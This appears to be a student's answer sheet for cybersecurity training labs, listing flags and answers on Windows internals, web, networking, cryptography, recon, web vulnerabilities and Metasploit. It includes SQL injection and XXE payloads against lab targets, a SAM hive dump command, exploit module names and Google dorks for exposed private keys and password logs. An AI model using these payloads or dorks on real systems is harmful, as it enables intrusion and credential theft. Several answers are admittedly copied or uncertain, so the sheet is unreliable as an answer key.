# Resources
## OSINT
- theHarvester: https://github.com/laramies/theHarvester
# WINDOWS SERVER
## Qn before filesystems
1. Q1BunnyFlag
2. qe5mRoPJjQ0
3. 3
4. **secret.txt** (i cheated for the next 3 qns, can't find them) haizz thanks for ans
5. **bunny, cyberassembly**
6. **FoundTheWoof**
## Qn for filesystems
1. testfile3.txt
2. ThiZI5Th3P@5s
3. M@g1cNumBerzAr3The#
4. 1.7
5. PDF+H!dd3N1m@gE
## Qn for device drivers
Might not be in order
1. 3
2. 13
3. {4d36e969-e325-11ce-bfc1-08002be10318}\0000 (go to the driver > properties > details tab > from dropdown got driver key, wtf it's wrong)
4. 4d36e968-e325-11ce-bfc1-08002be10318
5. 338
6. fdc.sys
7. **D0ntUseBuggyDr1ver!** - idk how to get this
## SAM (VERY IMPORTANT, YOUTUBE VIDEO ALSO GOT TALK BOUT IT)
1. NTLM
2. USED BY WINDOWS
3. reg save hklm
4. 259745CB123A52AA2E693AAACCA2DB52 - i cant get admin rights (run ur cmd prompt as administrator? idk how lol omg im a dumbfuck did it work for u?) HAHAHHA
## Permissions
1. 6
2. Guests
3. Gr0up5-are-4-P3rmis5!0nz - i dunno how, and it seems stupid (net localgroup "Limited Users")
4. N0wIHav3P3rmissionz!
5. LocalUser
6.
## Processes
1. `winnit`
2. 1
3. `users\student\documents\winnit\winnit.exe`
4. `windows\system32\wininit.exe`
# Web Fundamentals
## Web Anatomy
1. 320241610
2. 762637260
3. external
## URL (i cheated for 2,3,4 teach me plsssss)
1. Bristol City 2:2 Portsmouth
2. tomgorun
3. choochootrain
4. HIN-EPAL-ISE
## HTTP
1. QCR-DFW-PP1
2. HTTP/1.1 401 Unauthorized
3. 307
4. прапор.herokuapp.com
## HTTP Messages (cheated for 2 & 3)
1. GET HEAD PUT
2. CHK-MWR-XTP
3. A11-BQD-347
## HTTPS
1. Entrust
2. myselfsigncert.com
3. 2015-04-13
4. badssl.com
5. ERR_CERT_COMMON_NAME_INVALID
## COOKIE
1. Finland
2. 7
3. npanop-cart-item-IB=red-shoe
4. REDPOWDER
5. BLUECHEESE
6. x0Ax0Bx0C
## WEB CONTENT
1. `<p id="task1p" style = "color:green;font-weight:bold">`
2. #footer
3. `™`
4. onclick="popup()"
5. 16
## WEB AUTHENTICATION
1. steve:P@55W0rd
2. KINGDOM-KEYS
3. $11,843 (cheated, teach pls) - u can use burp on kali, it can mock requests via proxy
# Computer Networks
## What is a Network
1. PSTN
2. Printers in different...
3. POP3
4. ONT is a modem...
You can use CAT5...
1Gbps is about 125MB/s
5. 01 | 525 | 5250116165992121
6. BCA Academy
7. M1
## Network Switching
1. Samsung
2. 0A:58
3. 255.255.192.0
4. 1
## Internet Protocol
1. 16
2. ipconfig | ifconfig | www.whatismyip.com
3. 179.195.142.49
4. 127.0.0.0 - 127.255.255.255
5. 192.18.1.20 (look under `en0` for `inet`)
6. NO
7. 2401:7400:c802:c12c:1018:64ed:a78:f483
8. M1LIMITED-SG
9. NO
## IP Subnetting
(can search up subnet calculator to make life easier)
1. C
2. 2
3. 255.255.255.224
4. 2
5. 48
6. 192.168.4.0
7. 192.168.5.255
8. 2^32
9. /22
10. 192.10.8.0 - 192.10.11.255
## Hub, Switch and Routers
1. It is a common...
As it contains multiple...
It is sometimes...
2. It offers more security...
All users get...
It is a networking...
3. 2
4. 10-0-64-1. (use `route`)
5. The route is to a host
## DHCP
1. 1day
2. The number of users...
The type of devices...
3. Client connects...
The server offers...
The client requests...
The server ack...
4. IP address is pre...
IP address is assigned...
DHCPs server choose...
5. 1
## TCP and UDP
1. Provides transport...
2. DHCP
3. No
4. The client and...
5. 2600321110
6. SYN---10.0.0.2---10.0.0.1---SYN, ACK---10.0.0.1---10.0.0.2---ACK---4---4---46---46---146 (no idea why the numbers are as such * i think cos the next ack is sum of the previous seq + len)
## Network Ports and Services
1. 25
2. POP3
3. Simple File Transfer Protocol
4. Border Gateway Protocol
5. 143
6. 22
7. 443 (HTTP over SSL)
8. 3389
## The Internet
1. 12
2. United States
3. 4
4. Unknown
5. The target's firewall...
6. Stanford
7. 66.135.192.0
8. 1987
# Practical Cryptography
## Base64 Encoding
1. The secret of the mysterious Dr. James David Emmanuel Morpheus can be found in a safe with the combination derived from his initials.
2. 2
3. 68 74 68 69 77
4. 104112104105115
## Cooking with CyberChef (this is fucking bullshit idk 2 & 3)
1. Adrift in space with no food or water, Tony Stark sends a message to Pepper Potts as his oxygen supply starts to dwindle.
2. 02:02:17:08:19:45 (Use regex -- cyberchef has a mac address regex for us lol, yup verified)
3. Chicken Satay (unescape /u, from base62)
4. wallacefund.info
## Cryptography Concepts (i dont understand 2nd)
1. 0
2. Look Mum, this is XOR Cipher! use https://www.dcode.fr/xor-cipher
## Substitution Cipher (Cheated 3rd)
1. WINTER IS COMING
2. The quieter you become the more you are able to hear (use https://manansingh.github.io/Cryptolab-Offline/c2-brute-caesar.html)
3. TO KNOW ONE THING, YOU MUST KNOW THE OPPOSITE
## Symmetric Encryption (Cheated both)
1. Banana Pie (AES config: Key - Base64, IV - Hex, Output - Raw; Then copy the Base64 encoded portion and render it as an image)
2. 172.34.1.6 (XOR bruteforce, search known text for ip)
## Asymmetric Encryption
1. PEM
2. MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRAO2jgknGFx2dnKZ98SmvOIkCAwEAAQ==
3. 17 (openssl asn1parse -inform PEM -in public.key)
4. 65537,315876021947176554134636632520906455177 (openssl rsa -pubin -inform PEM -text -noout < public.key)
5. 17436516701977586663 (cheated)
6. 314574672695216017766833050644278618749 (cheated)
7. 266760251129810687951040851345059067404
8. 118757429129215 (cheated)
## Hashing
1. qwertyuiop (use cracking: https://crackstation.net/)
2. 2,6 (idk how to bake, help) (https://bcrypt-generator.com/, use the right side, put in the password from q1)
3. rbbGKHQbUdnLzN3wMwhOLu
## Steganography
1. Spam lizard king
2. This is secret message by The Cyber Assembly (use: https://manytools.org/hacker-tools/steganography-encode-text-into-image/go/)
3. Area52 is real (Cyberchef)
## Applying Cryptography (I got lazy but can try using: https://www.101computing.net/enigma-machine-emulator/)
1. EVA
2. ALPHA ATTACK FROM SOUTH WEST OVER
# Recon and Scanning
## NMAP
1. HTTP and HTTPS
2. HTTP, HTTPS, IMAP, POP3
3. email (cb i put mail wrong)
4. fuck rihanna lol its `nmap 192.168.115.128` no lah cheebs `nmap -sV 10.10.156.55`
5. Refer to cheatsheet
## Network Discovery
1. 4
2. 80/tcp closed
3. mysql
4. 6 hi no it's 5
5. 69
6. kN0<K1nGP0rtSar3FuN! (idk the command D:) it shud be tftp get, but mine is broken as well. anyone know can pm telegram pls tks
## Banner Grabbing
1. 4
2. 220 The Cyber Assembly FTP Server
3. 7.9
4. lighttpd/1.4.52
5. mariaDB, mysql
## Finger Printing
1. R=Y%DFI=N%T=FF%CD=S
2. Good luck!
3. 4d:79:de:76:0e:ad:0f:0c:fd:3c:9e:fb:74:27
4. yes
5. 255 (sudo nmap -p 21 -sS --packet-trace 10.0.138.154)
6. 4
## Foot Printing (cheated for 4 5 6)
1. GRABTAXI HOLDINGS PTE LTD (fuck grab)
2. devops@grab.co
3. 94550714
4. 16509 (Find AS number for AMAZON-02, which is just amazon)
5. engineering.grab.com (nobody has time to 1 by 1 search)
6. rocketsciencegroup.com (iplookup 198.2.181.89)
## DNS Recon (wholesale cheated)
Idk why i cant dig this website portal.bakeshop.com
1. www.bakeshop.com (dig @targetIP portal.bakeshop.com)
2. 201.45.16.1
3. privateemail
4. master@bakeshop.net
5. d111111abcdef8.cloudfront.net
6. RECONN LIVES HERE
## Website Recon
1. php
2. 66
3. wJalrXUtnFEM7MDEbPxRfiC
4. Unknown database 'bWAPP
5. install=yes
6. The name of The Cyber Assembly poodle is Bubbles
## WhatWeb
1. 8
2. Wix
3. EatLiveSleep
4. 7.1.33
5. CVE-2018-19935
# Web Vulnerabilities
## SQL Injection (Cheated everything wtf pls share)
1. Hey I Have Changed The Original Text
   (I read https://gerbenjavado.com/manual-sql-injection-discovery-tips/ The one that worked was pasting `' OR 1='1` into password)
2. bWAPP
   Command I used: `man' union select NULL, database(), NULL, NULL, NULL, NULL, NULL;#`
   Follow the 2nd ref below to see the steps in discovery (basically keep adding no. of NULL till union succeeds)
   References:
   - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
   - https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/#gref
4. 6885858486f31043e5839c735d99457f045affd0
   `man' union SELECT null,table_schema, table_name, column_name,null,null,null FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' union select 1,2,3,4,5,6,7;#` to view all database names, table names, and column names
   `man' union SELECT null, login, password, id,null,email,null FROM users union select 1,2,3,4,5,6,7;#`
6. %
## Broken Authentication (EH HELP LA THE LAB LINK AND THE ANS KEY ALL DIFFERENT CB) <- is this weepz clicking on the wrong link again?
1. carrey:xing
2. IbrokeTheAuthenticationEzbz
## File Inclusion (Cheated again whew)
1. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
2. inclusionisfun
## Directory Traversal
1. 5 (finally i got a correct ans >.>)
2. ijustincludedthis2ec6b
## CSRF
1. first 2
2. deleteall
3. whereismygallery
## XSS
1. 8
2. YouByPaSSTheBarrier
3. both sanitise
4. dom-based
## Command Injection
1. www-data
2. 000
3. FRANCE
4. Sanitisation
## XML External Entity
```xml
<!DOCTYPE learn [
<!ENTITY learnhack SYSTEM "file:///etc/passwd">]>
<reset>
<login>&learnhack;</login>
<secret>Any bugs?</secret>
</reset>
```
# Metasploit
## Metasploit Architecture
1. ruby
2. msfconsole
3. wordlists
4. REX: basic library, UI: includes commandline, plugins: automate, msf base: provide utility for third party, msf core: interface for interaction, modules: used in exploits
## MsfConsole
1. postgresql
2. history
3. exploit/multi/browser/adobe_flash_hacking_team_uaf (googled it lol fk downloading my own msfconsole on windows)
4. CVE-2015-5119
5. use exploit/multi/browser/adobe_flash_hacking_team_uaf
6. 2
## ExploitDB
1. searchsploit -u
2. 2
3. Mehmet EMIROGLU (https://www.exploit-db.com/exploits/46550)
4. 9
5. searchsploit 46550 -w
6. 5970
## Auxiliary
1. 22 (use auxiliary/scanner/portscan/syn, interface is eth0, use sudo -i before running msfconsole)
2. SSH-2.0/OpenSSH-8.0 (forgot the exact string, run auxiliary/scanner/ssh/version something)
3. startorn (one of the ssh auxiliary)
4. HOwYouFIndMeeeeee (https://superuser.com/questions/1322515/meterpreter-on-ssh-connection, sessions -i <identification>, ls, cat)
## Exploits
1. CVE-2010-0926 (google)
2. auxiliary/admin/smb/samba_symlink_traversal (search cve:0926)
3. Carrey:x:2000:2000::/home/Carrey:/bin/bash (https://null-byte.wonderhowto.com/how-to/get-root-filesystem-access-via-samba-symlink-traversal-0198509/, get passwd)
4. setg
## Payloads
1. Apache/2.4.10 (Debian) use auxiliary/scanner/http/http_version
2. 5.4.1 (i got issues with this )
3. exploit/multi/http/php_cgi_arg_injection
4. (forgot cheated)
5. (forgot cheated)
## Database
1. database.yml (read the help)
2. db_import originalmsfdb.xml
# Wireshark
## Using wireshark
1. tshark
2. libpcap
3. Npcap
## Navigating wireshark
1. 478
2. 145.254.160.237
3. 40
# Credentials Hashes
## Crack Hash
- John the Ripper
- hydra
- hashcat
- hashkiller
## Crack rainbow
- Ophcrack
- RainbowCrack
# Wireshark
## tcpdump
1. 6
2. avengers.com
3. 192.168.1.107
4. HowYouManageToFindMe
5. 192.168.72.130
# OSINT
## Shodan
1. product:"OpenSSH" -port:"22" country:"SG"
2. product:"MySQL" os:"Windows XP"
3. snmp
## Google dorks
1. allintext:username password filetype:log
2. inurl:8443 -intext:8443
3. inurl:top.htm inurl:currenttime
4. "----BEGIN RSA PRIVATE KEY-----" ext:key
## Harvester
theharvester.py
# Wireshark
## Packet capture
1. no
2. live capture in progress
3. no
4. no